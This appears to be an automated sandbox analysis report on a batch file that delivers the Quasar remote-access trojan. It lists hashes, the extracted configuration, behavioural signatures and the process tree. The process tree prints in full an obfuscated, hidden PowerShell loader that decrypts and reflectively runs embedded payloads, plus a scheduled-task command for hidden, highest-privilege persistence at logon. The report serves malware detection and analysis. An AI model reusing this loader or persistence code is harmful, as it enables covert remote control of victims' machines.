Analysis
-
max time kernel
38s -
max time network
43s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
11-02-2025 11:21
Static task
static1
General
-
Target
startup_str_232.bat
-
Size
1.8MB
-
MD5
d7c48a5173ca5bc25644c9799109c835
-
SHA1
8845470e96cf21d7ff11961d3dd370787960dc22
-
SHA256
39b6ba1d146867517cb7772b4a9665bf9139319dcb9e01ebb584ddab9daf54a8
-
SHA512
e6a9e4d84ae1609ce511ba346faac33023e5ed3217a5c082be69ef18378ae3498153659aeeb506d2100c696cb50d329e6c2c24d4233c2b1f9442a5c59293a939
-
SSDEEP
24576:va3qjALWb5fJ3LTbHrDt9uwqPffkE8s706cW4DNTfWihRFxwVyU6fmD7+P+XbCBe:y6ALi5fdLT1qPHlovRciV+VLkrWy4hx
Malware Config
Extracted
quasar
1.0.0
Office04
127.0.0.1:4782
504956fd-d532-425c-9e82-cbe7902cf377
-
encryption_key
B8B9B325A830EF659FA4EC42DB8AA956BB46428A
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral1/memory/4756-51-0x000001B1EA530000-0x000001B1EA854000-memory.dmp family_quasar -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 3300 powershell.exe 3680 powershell.exe 4756 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 3300 powershell.exe 3300 powershell.exe 3680 powershell.exe 3680 powershell.exe 4756 powershell.exe 4756 powershell.exe 4756 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3300 powershell.exe Token: SeDebugPrivilege 3680 powershell.exe Token: SeIncreaseQuotaPrivilege 3680 powershell.exe Token: SeSecurityPrivilege 3680 powershell.exe Token: SeTakeOwnershipPrivilege 3680 powershell.exe Token: SeLoadDriverPrivilege 3680 powershell.exe Token: SeSystemProfilePrivilege 3680 powershell.exe Token: SeSystemtimePrivilege 3680 powershell.exe Token: SeProfSingleProcessPrivilege 3680 powershell.exe Token: SeIncBasePriorityPrivilege 3680 powershell.exe Token: SeCreatePagefilePrivilege 3680 powershell.exe Token: SeBackupPrivilege 3680 powershell.exe Token: SeRestorePrivilege 3680 powershell.exe Token: SeShutdownPrivilege 3680 powershell.exe Token: SeDebugPrivilege 3680 powershell.exe Token: SeSystemEnvironmentPrivilege 3680 powershell.exe Token: SeRemoteShutdownPrivilege 3680 powershell.exe Token: SeUndockPrivilege 3680 powershell.exe Token: SeManageVolumePrivilege 3680 powershell.exe Token: 33 3680 powershell.exe Token: 34 3680 powershell.exe Token: 35 3680 powershell.exe Token: 36 3680 powershell.exe Token: SeIncreaseQuotaPrivilege 3680 powershell.exe Token: SeSecurityPrivilege 3680 powershell.exe Token: SeTakeOwnershipPrivilege 3680 powershell.exe Token: SeLoadDriverPrivilege 3680 powershell.exe Token: SeSystemProfilePrivilege 3680 powershell.exe Token: SeSystemtimePrivilege 3680 powershell.exe Token: SeProfSingleProcessPrivilege 3680 powershell.exe Token: SeIncBasePriorityPrivilege 3680 powershell.exe Token: SeCreatePagefilePrivilege 3680 powershell.exe Token: SeBackupPrivilege 3680 powershell.exe Token: SeRestorePrivilege 3680 powershell.exe Token: SeShutdownPrivilege 3680 powershell.exe Token: SeDebugPrivilege 3680 powershell.exe Token: SeSystemEnvironmentPrivilege 3680 powershell.exe Token: SeRemoteShutdownPrivilege 3680 powershell.exe Token: SeUndockPrivilege 3680 powershell.exe Token: SeManageVolumePrivilege 3680 powershell.exe Token: 33 3680 powershell.exe Token: 34 3680 powershell.exe Token: 35 3680 powershell.exe Token: 36 3680 powershell.exe Token: SeIncreaseQuotaPrivilege 3680 powershell.exe Token: SeSecurityPrivilege 3680 powershell.exe Token: SeTakeOwnershipPrivilege 3680 powershell.exe Token: SeLoadDriverPrivilege 3680 powershell.exe Token: SeSystemProfilePrivilege 3680 powershell.exe Token: SeSystemtimePrivilege 3680 powershell.exe Token: SeProfSingleProcessPrivilege 3680 powershell.exe Token: SeIncBasePriorityPrivilege 3680 powershell.exe Token: SeCreatePagefilePrivilege 3680 powershell.exe Token: SeBackupPrivilege 3680 powershell.exe Token: SeRestorePrivilege 3680 powershell.exe Token: SeShutdownPrivilege 3680 powershell.exe Token: SeDebugPrivilege 3680 powershell.exe Token: SeSystemEnvironmentPrivilege 3680 powershell.exe Token: SeRemoteShutdownPrivilege 3680 powershell.exe Token: SeUndockPrivilege 3680 powershell.exe Token: SeManageVolumePrivilege 3680 powershell.exe Token: 33 3680 powershell.exe Token: 34 3680 powershell.exe Token: 35 3680 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4756 powershell.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 4756 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 2716 wrote to memory of 3300 2716 cmd.exe 89 PID 2716 wrote to memory of 3300 2716 cmd.exe 89 PID 3300 wrote to memory of 3680 3300 powershell.exe 93 PID 3300 wrote to memory of 3680 3300 powershell.exe 93 PID 3300 wrote to memory of 2452 3300 powershell.exe 96 PID 3300 wrote to memory of 2452 3300 powershell.exe 96 PID 2452 wrote to memory of 4408 2452 WScript.exe 97 PID 2452 wrote to memory of 4408 2452 WScript.exe 97 PID 4408 wrote to memory of 4756 4408 cmd.exe 99 PID 4408 wrote to memory of 4756 4408 cmd.exe 99
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\startup_str_232.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Gfr4+zeD+/eWhB2QAGtJiORh9A6UOWX3etZcAfnNQuY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z4PHG4bhLDvAXMFT9uGv8g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZgiJx=New-Object System.IO.MemoryStream(,$param_var); $nEiVV=New-Object System.IO.MemoryStream; $YutHx=New-Object System.IO.Compression.GZipStream($ZgiJx, [IO.Compression.CompressionMode]::Decompress); $YutHx.CopyTo($nEiVV); $YutHx.Dispose(); $ZgiJx.Dispose(); $nEiVV.Dispose(); $nEiVV.ToArray();}function execute_function($param_var,$param2_var){ $opAvX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QPQSI=$opAvX.EntryPoint; $QPQSI.Invoke($null, $param2_var);}$knrmS = 'C:\Users\Admin\AppData\Local\Temp\startup_str_232.bat';$host.UI.RawUI.WindowTitle = $knrmS;$zAhSA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($knrmS).Split([Environment]::NewLine);foreach ($giYxD in $zAhSA) { if ($giYxD.StartsWith(':: ')) { $iOpvd=$giYxD.Substring(3); break; }}$payloads_var=[string[]]$iOpvd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3300 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_994_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_994.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3680
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_994.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_994.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Gfr4+zeD+/eWhB2QAGtJiORh9A6UOWX3etZcAfnNQuY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z4PHG4bhLDvAXMFT9uGv8g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZgiJx=New-Object System.IO.MemoryStream(,$param_var); $nEiVV=New-Object System.IO.MemoryStream; $YutHx=New-Object System.IO.Compression.GZipStream($ZgiJx, [IO.Compression.CompressionMode]::Decompress); $YutHx.CopyTo($nEiVV); $YutHx.Dispose(); $ZgiJx.Dispose(); $nEiVV.Dispose(); $nEiVV.ToArray();}function execute_function($param_var,$param2_var){ $opAvX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QPQSI=$opAvX.EntryPoint; $QPQSI.Invoke($null, $param2_var);}$knrmS = 'C:\Users\Admin\AppData\Roaming\startup_str_994.bat';$host.UI.RawUI.WindowTitle = $knrmS;$zAhSA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($knrmS).Split([Environment]::NewLine);foreach ($giYxD in $zAhSA) { if ($giYxD.StartsWith(':: ')) { $iOpvd=$giYxD.Substring(3); break; }}$payloads_var=[string[]]$iOpvd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4756
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
1KB
MD5dbbf71e9fb59f80938f09809b160e441
SHA18b9a517d846cb9a0a284f77ed88328236a85055f
SHA256e1de59d46c7c47af2d62f7754524b080a706be6b38d55a03733a10c3675598b1
SHA51290b75d43ddb81c710fb8fe2fd15b5c05181c774d3f401e47862006adb1703bc65ad8fead4aaf7a28b8e2bbe7249f3de998bd9432c1e62fa8718a19dacc4b8840
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.8MB
MD5d7c48a5173ca5bc25644c9799109c835
SHA18845470e96cf21d7ff11961d3dd370787960dc22
SHA25639b6ba1d146867517cb7772b4a9665bf9139319dcb9e01ebb584ddab9daf54a8
SHA512e6a9e4d84ae1609ce511ba346faac33023e5ed3217a5c082be69ef18378ae3498153659aeeb506d2100c696cb50d329e6c2c24d4233c2b1f9442a5c59293a939
-
Filesize
115B
MD5569721bd1c75d9acaa005072c5870f25
SHA1ab658262db8c1b76100b3079667a1348fbc685b7
SHA2564813d9eee1a74ee6c5fa1b72dbdb2a5f46f068690f5259b4d2c80eca31c4fcd5
SHA512fe54c474195458fe653dfa0b89723a3df8ef21f3848e0da17da73837a22c0715831419bebd8d99c7829b56dd64b444305a608301003c53b0b46156e6f4eed557